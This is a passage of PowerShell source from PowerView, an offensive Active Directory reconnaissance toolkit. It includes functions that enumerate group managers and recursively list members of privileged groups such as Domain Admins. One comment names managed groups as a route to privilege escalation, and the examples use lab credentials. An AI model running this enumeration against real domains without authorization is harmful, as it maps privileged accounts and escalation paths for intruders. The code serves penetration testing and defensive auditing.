ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nNew-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred\n\nCreates the 'TestGroup' group with the specified description using the specified alternate credentials.\n\n.OUTPUTS\n\nDirectoryServices.AccountManagement.GroupPrincipal\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('DirectoryServices.AccountManagement.GroupPrincipal')]\n    Param(\n        [Parameter(Mandatory = $True)]\n        [ValidateLength(0, 256)]\n        [String]\n        $SamAccountName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Name,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $DisplayName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Description,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    $ContextArguments = @{\n        'Identity' = $SamAccountName\n    }\n    if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }\n    $Context = Get-PrincipalContext @ContextArguments\n\n    if ($Context) {\n        $Group = New-Object -TypeName System.DirectoryServices.AccountManagement.GroupPrincipal -ArgumentList ($Context.Context)\n\n        # set all the appropriate group parameters\n        $Group.SamAccountName = $Context.Identity\n\n        if ($PSBoundParameters['Name']) {\n            $Group.Name = $Name\n        }\n        else {\n            $Group.Name = $Context.Identity\n        }\n        if ($PSBoundParameters['DisplayName']) {\n            $Group.DisplayName = $DisplayName\n        }\n        else {\n            $Group.DisplayName = $Context.Identity\n        }\n\n        if ($PSBoundParameters['Description']) {\n            $Group.Description = $Description\n        }\n\n        Write-Verbose \"[New-DomainGroup] Attempting to create group '$SamAccountName'\"\n        try {\n            $Null = $Group.Save()\n            Write-Verbose \"[New-DomainGroup] Group '$SamAccountName' successfully created\"\n            $Group\n        }\n        catch {\n            Write-Warning \"[New-DomainGroup] Error creating group '$SamAccountName' : $_\"\n        }\n    }\n}\n\n\nfunction Get-DomainManagedSecurityGroup {\n<#\n.SYNOPSIS\n\nReturns all security groups in the current (or target) domain that have a manager set.\n\nAuthor: Stuart Morgan (@ukstufus) <stuart.morgan@mwrinfosecurity.com>, Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl  \n\n.DESCRIPTION\n\nAuthority to manipulate the group membership of AD security groups and distribution groups\ncan be delegated to non-administrators by setting the 'managedBy' attribute. This is typically\nused to delegate management authority to distribution groups, but Windows supports security groups\nbeing managed in the same way.\n\nThis function searches for AD groups which have a group manager set, and determines whether that\nuser can manipulate group membership. This could be a useful method of horizontal privilege\nescalation, especially if the manager can manipulate the membership of a privileged group.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv\n\nStore a list of all security groups with managers in group-managers.csv\n\n.OUTPUTS\n\nPowerView.ManagedSecurityGroup\n\nA custom PSObject describing the managed security group.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ManagedSecurityGroup')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'LDAPFilter' = '(&(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))'\n            'Properties' = 'distinguishedName,managedBy,samaccounttype,samaccountname'\n        }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Domain']) {\n            $SearcherArguments['Domain'] = $Domain\n            $TargetDomain = $Domain\n        }\n        else {\n            $TargetDomain = $Env:USERDNSDOMAIN\n        }\n\n        # go through the list of security groups on the domain and identify those who have a manager\n        Get-DomainGroup @SearcherArguments | ForEach-Object {\n            $SearcherArguments['Properties'] = 'distinguishedname,name,samaccounttype,samaccountname,objectsid'\n            $SearcherArguments['Identity'] = $_.managedBy\n            $Null = $SearcherArguments.Remove('LDAPFilter')\n\n            # $SearcherArguments\n            # retrieve the object that the managedBy DN refers to\n            $GroupManager = Get-DomainObject @SearcherArguments\n            # Write-Host \"GroupManager: $GroupManager\"\n            $ManagedGroup = New-Object PSObject\n            $ManagedGroup | Add-Member Noteproperty 'GroupName' $_.samaccountname\n            $ManagedGroup | Add-Member Noteproperty 'GroupDistinguishedName' $_.distinguishedname\n            $ManagedGroup | Add-Member Noteproperty 'ManagerName' $GroupManager.samaccountname\n            $ManagedGroup | Add-Member Noteproperty 'ManagerDistinguishedName' $GroupManager.distinguishedName\n\n            # determine whether the manager is a user or a group\n            if ($GroupManager.samaccounttype -eq 0x10000000) {\n                $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'Group'\n            }\n            elseif ($GroupManager.samaccounttype -eq 0x30000000) {\n                $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'User'\n            }\n\n            $ACLArguments = @{\n                'Identity' = $_.distinguishedname\n                'RightsFilter' = 'WriteMembers'\n            }\n            if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }\n            if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }\n            if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }\n            if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }\n            if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }\n            if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }\n\n            # # TODO: correct!\n            # # find the ACLs that relate to the ability to write to the group\n            # $xacl = Get-DomainObjectAcl @ACLArguments -Verbose\n            # # $ACLArguments\n            # # double-check that the manager\n            # if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AceType -eq 'AccessAllowed' -and ($xacl.ObjectSid -eq $GroupManager.objectsid)) {\n            #     $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $True\n            # }\n            # else {\n            #     $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $False\n            # }\n\n            $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' 'UNKNOWN'\n\n            $ManagedGroup.PSObject.TypeNames.Insert(0, 'PowerView.ManagedSecurityGroup')\n            $ManagedGroup\n        }\n    }\n}\n\n\nfunction Get-DomainGroupMember {\n<#\n.SYNOPSIS\n\nReturn the members of a specific domain group.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for the specified\ngroup matching the criteria. Each result is then rebound and the full user\nor group object is returned.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\nspecifying the group to query for. Wildcards accepted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Recurse\n\nSwitch. If the group member is a group, recursively try to query its members as well.\n\n.PARAMETER RecurseUsingMatchingRule\n\nSwitch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.\nMuch faster than manual recursion, but doesn't reveal cross-domain groups,\nand only returns user accounts (no nested group objects themselves).\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainGroupMember \"Desktop Admins\"\n\nGroupDomain             : testlab.local\nGroupName               : Desktop Admins\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\nMemberDomain            : testlab.local\nMemberName              : Testing Group\nMemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local\nMemberObjectClass       : group\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1129\n\nGroupDomain             : testlab.local\nGroupName               : Desktop Admins\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\nMemberDomain            : testlab.local\nMemberName              : arobbins.a\nMemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local\nMemberObjectClass       : user\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112\n\n.EXAMPLE\n\n'Desktop Admins' | Get-DomainGroupMember -Recurse\n\nGroupDomain             : testlab.local\nGroupName               : Desktop Admins\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\nMemberDomain            : testlab.local\nMemberName              : Testing Group\nMemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local\nMemberObjectClass       : group\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1129\n\nGroupDomain             : testlab.local\nGroupName               : Testing Group\nGroupDistinguishedName  : CN=Testing Group,CN=Users,DC=testlab,DC=local\nMemberDomain            : testlab.local\nMemberName              : harmj0y\nMemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local\nMemberObjectClass       : user\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1108\n\nGroupDomain             : testlab.local\nGroupName               : Desktop Admins\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\nMemberDomain            : testlab.local\nMemberName              : arobbins.a\nMemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local\nMemberObjectClass       : user\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112\n\n.EXAMPLE\n\nGet-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule\n\nGroupDomain             : testlab.local\nGroupName               : Desktop Admins\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\nMemberDomain            : testlab.local\nMemberName              : harmj0y\nMemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local\nMemberObjectClass       : user\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1108\n\nGroupDomain             : testlab.local\nGroupName               : Desktop Admins\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\nMemberDomain            : testlab.local\nMemberName              : arobbins.a\nMemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local\nMemberObjectClass       : user\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112\n\n.EXAMPLE\n\nGet-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember\n\n.EXAMPLE\n\n'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'\n\n.EXAMPLE\n\nGet-Domain | Select-Object -Expand name\ntestlab.local\n\n'dev\\domain admins' | Get-DomainGroupMember -Verbose\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainGroupMember] Extracted domain 'dev.testlab.local' from 'dev\\domain admins'\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\nVERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))\n\nGroupDomain             : dev.testlab.local\nGroupName               : Domain Admins\nGroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local\nMemberDomain            : dev.testlab.local\nMemberName              : user1\nMemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local\nMemberObjectClass       : user\nMemberSID               : S-1-5-21-339048670-1233568108-4141518690-201108\n\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))\nGroupDomain             : dev.testlab.local\nGroupName               : Domain Admins\nGroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local\nMemberDomain            : dev.testlab.local\nMemberName              : Administrator\nMemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local\nMemberObjectClass       : user\nMemberSID               : S-1-5-21-339048670-1233568108-4141518690-500\n\n.OUTPUTS\n\nPowerView.GroupMember\n\nCustom PSObject with translated group member property fields.\n\n.LINK\n\nhttp://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [OutputType('PowerView.GroupMember')]\n    [CmdletBinding(DefaultParameterSetName = 'None')]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Parameter(ParameterSetName = 'ManualRecurse')]\n        [Switch]\n        $Recurse,\n\n        [Parameter(ParameterSetName = 'RecurseUsingMatchingRule')]\n        [Switch]\n        $RecurseUsingMatchingRule,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'Properties' = 'member,samaccountname,distinguishedname'\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n        $ADNameArguments = @{}\n        if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        $GroupSearcher = Get-DomainSearcher @SearcherArguments\n        if ($GroupSearcher) {\n            if ($PSBoundParameters['RecurseUsingMatchingRule']) {\n                $SearcherArguments['Identity'] = $Identity\n                $SearcherArguments['Raw'] = $True\n                $Group = Get-DomainGroup @SearcherArguments\n\n                if (-not $Group) {\n                    Write-Warning \"[Get-DomainGroupMember] Error searching for group with identity: $Identity\"\n                }\n                else {\n                    $GroupFoundName = $Group.properties.item('samaccountname')[0]\n                    $GroupFoundDN = $Group.properties.item('distinguishedname')[0]\n\n                    if ($PSBoundParameters['Domain']) {\n                        $GroupFoundDomain = $Domain\n                    }\n                    else {\n                        # if a domain isn't passed, try to extract it from the found group distinguished name\n                        if ($GroupFoundDN) {\n                            $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        }\n                    }\n                    Write-Verbose \"[Get-DomainGroupMember] Using LDAP matching rule to recurse on '$GroupFoundDN', only user accounts will be returned.\"\n                    $GroupSearcher.filter = \"(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupFoundDN))\"\n                    $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName'))\n                    $Members = $GroupSearcher.FindAll() | ForEach-Object {$_.Properties.distinguishedname[0]}\n                }\n                $Null = $SearcherArguments.Remove('Raw')\n            }\n            else {\n                $IdentityFilter = ''\n                $Filter = ''\n                $Identity | Where-Object {$_} | ForEach-Object {\n                    $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n                    if ($IdentityInstance -match '^S-1-') {\n                        $IdentityFilter += \"(objectsid=$IdentityInstance)\"\n                    }\n                    elseif ($IdentityInstance -match '^CN=') {\n                        $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                        if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                            # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                            #   and rebuild the domain searcher\n                            $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                            Write-Verbose \"[Get-DomainGroupMember] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                            $SearcherArguments['Domain'] = $IdentityDomain\n                            $GroupSearcher = Get-DomainSearcher @SearcherArguments\n                            if (-not $GroupSearcher) {\n                                Write-Warning \"[Get-DomainGroupMember] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                            }\n                        }\n                    }\n                    elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {\n                        $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\\' + $_.ToString('X2') }) -join ''\n                        $IdentityFilter += \"(objectguid=$GuidByteString)\"\n                    }\n                    elseif ($IdentityInstance.Contains('\\')) {\n                        $ConvertedIdentityInstance = $IdentityInstance.Replace('\\28', '(').Replace('\\29', ')') | Convert-ADName -OutputType Canonical\n                        if ($ConvertedIdentityInstance) {\n                            $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))\n                            $GroupName = $IdentityInstance.Split('\\')[1]\n                            $IdentityFilter += \"(samAccountName=$GroupName)\"\n                            $SearcherArguments['Domain'] = $GroupDomain\n                            Write-Verbose \"[Get-DomainGroupMember] Extracted domain '$GroupDomain' from '$IdentityInstance'\"\n                            $GroupSearcher = Get-DomainSearcher @SearcherArguments\n                        }\n                    }\n                    else {\n                        $IdentityFilter += \"(samAccountName=$IdentityInstance)\"\n                    }\n                }\n\n                if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                    $Filter += \"(|$IdentityFilter)\"\n                }\n\n                if ($PSBoundParameters['LDAPFilter']) {\n                    Write-Verbose \"[Get-DomainGroupMember] Using additional LDAP filter: $LDAPFilter\"\n                    $Filter += \"$LDAPFilter\"\n                }\n\n                $GroupSearcher.filter = \"(&(objectCategory=group)$Filter)\"\n                Write-Verbose \"[Get-DomainGroupMember] Get-DomainGroupMember filter string: $($GroupSearcher.filter)\"\n                try {\n                    $Result = $GroupSearcher.FindOne()\n                }\n                catch {\n                    Write-Warning \"[Get-DomainGroupMember] Error searching for group with identity '$Identity': $_\"\n                    $Members = @()\n                }\n\n                $GroupFoundName = ''\n                $GroupFoundDN = ''\n\n                if ($Result) {\n                    $Members = $Result.properties.item('member')\n\n                    if ($Members.count -eq 0) {\n                        # ranged searching, thanks @meatballs__ !\n                        $Finished = $False\n                        $Bottom = 0\n                        $Top = 0\n\n                        while (-not $Finished) {\n                            $Top = $Bottom + 1499\n                            $MemberRange=\"member;range=$Bottom-$Top\"\n                            $Bottom += 1500\n                            $Null = $GroupSearcher.PropertiesToLoad.Clear()\n                            $Null = $GroupSearcher.PropertiesToLoad.Add(\"$MemberRange\")\n                            $Null = $GroupSearcher.PropertiesToLoad.Add('samaccountname')\n                            $Null = $GroupSearcher.PropertiesToLoad.Add('distinguishedname')\n\n                            try {\n                                $Result = $GroupSearcher.FindOne()\n                                $RangedProperty = $Result.Properties.PropertyNames -like \"member;range=*\"\n                                $Members += $Result.Properties.item($RangedProperty)\n                                $GroupFoundName = $Result.properties.item('samaccountname')[0]\n                                $GroupFoundDN = $Result.properties.item('distinguishedname')[0]\n\n                                if ($Members.count -eq 0) {\n                                    $Finished = $True\n                                }\n                            }\n                            catch [System.Management.Automation.MethodInvocationException] {\n                                $Finished = $True\n                            }\n                        }\n                    }\n                    else {\n                        $GroupFoundName = $Result.properties.item('samaccountname')[0]\n                        $GroupFoundDN = $Result.properties.item('distinguishedname')[0]\n                        $Members += $Result.Properties.item($RangedProperty)\n                    }\n\n                    if ($PSBoundParameters['Domain']) {\n                        $GroupFoundDomain = $Domain\n                    }\n                    else {\n                        # if a domain isn't passed, try to extract it from the found group distinguished name\n                        if ($GroupFoundDN) {\n                            $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        }\n                    }\n                }\n            }\n\n            ForEach ($Member in $Members) {\n                if ($Recurse -and $UseMatchingRule) {\n                    $Properties = $_.Properties\n                }\n                else {\n                    $ObjectSearcherArguments = $SearcherArguments.Clone()\n                    $ObjectSearcherArguments['Identity'] = $Member\n                    $ObjectSearcherArguments['Raw'] = $True\n                    $ObjectSearcherArguments['Properties'] = 'distinguishedname,cn,samaccountname,objectsid,objectclass'\n                    $Object = Get-DomainObject @ObjectSearcherArguments\n                    $Properties = $Object.Properties\n                }\n\n                if ($Properties) {\n                    $GroupMember = New-Object PSObject\n                    $GroupMember | Add-Member Noteproperty 'GroupDomain' $GroupFoundDomain\n                    $GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName\n                    $GroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupFoundDN\n\n                    if ($Properties.objectsid) {\n                        $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectsid[0], 0).Value)\n                    }\n                    else {\n                        $MemberSID = $Null\n                    }\n\n                    try {\n                        $MemberDN = $Properties.distinguishedname[0]\n                        if ($MemberDN -match 'ForeignSecurityPrincipals|S-1-5-21') {\n                            try {\n                                if (-not $MemberSID) {\n                                    $MemberSID = $Properties.cn[0]\n                                }\n                                $MemberSimpleName = Convert-ADName -Identity $MemberSID -OutputType 'DomainSimple' @ADNameArguments\n\n                                if ($MemberSimpleName) {\n                                    $MemberDomain = $MemberSimpleName.Split('@')[1]\n                                }\n                                else {\n                                    Write-Warning \"[Get-DomainGroupMember] Error converting $MemberDN\"\n                                    $MemberDomain = $Null\n                                }\n                            }\n                            catch {\n                                Write-Warning \"[Get-DomainGroupMember] Error converting $MemberDN\"\n                                $MemberDomain = $Null\n                            }\n                        }\n                        else {\n                            # extract the FQDN from the Distinguished Name\n                            $MemberDomain = $MemberDN.SubString($MemberDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        }\n                    }\n                    catch {\n                        $MemberDN = $Null\n                        $MemberDomain = $Null\n                    }\n\n                    if ($Properties.samaccountname) {\n                        # forest users have the samAccountName set\n                        $MemberName = $Properties.samaccountname[0]\n                    }\n                    else {\n                        # external trust users have a SID, so convert it\n                        try {\n                            $MemberName = ConvertFrom-SID -ObjectSID $Properties.cn[0] @ADNameArguments\n                        }\n                        catch {\n                            # if there's a problem contacting the domain to resolve the SID\n                            $MemberName = $Properties.cn[0]\n                        }\n                    }\n\n                    if ($Properties.objectclass -match 'computer') {\n                        $MemberObjectClass = 'computer'\n                    }\n                    elseif ($Properties.objectclass -match 'group') {\n                        $MemberObjectClass = 'group'\n                    }\n                    elseif ($Properties.objectclass -match 'user') {\n                        $MemberObjectClass = 'user'\n                    }\n                    else {\n                        $MemberObjectClass = $Null\n                    }\n                    $GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain\n                    $GroupMember | Add-Member Noteproperty 'MemberName' $MemberName\n                    $GroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDN\n                    $GroupMember | Add-Member Noteproperty 'MemberObjectClass' $MemberObjectClass\n                    $GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID\n                    $GroupMember.PSObject.TypeNames.Insert(0, 'PowerView.GroupMember')\n                    $GroupMember\n\n                    # if we're doing manual recursion\n                    if ($PSBoundParameters['Recurse'] -and $MemberDN -and ($MemberObjectClass -match 'group')) {\n                        Write-Verbose \"[Get-DomainGroupMember] Manually recursing on group: $MemberDN\"\n                        $SearcherArguments['Identity'] = $MemberDN\n                        $Null = $SearcherArguments.Remove('Properties')\n                        Get-DomainGroupMember @SearcherArguments\n                    }\n                }\n            }\n            $GroupSearcher.dispose()\n        }\n    }\n}\n\n\nfunction Get-DomainGroupMemberDeleted {\n<#\n.SYNOPSIS\n\nReturns information on group members that were removed from the 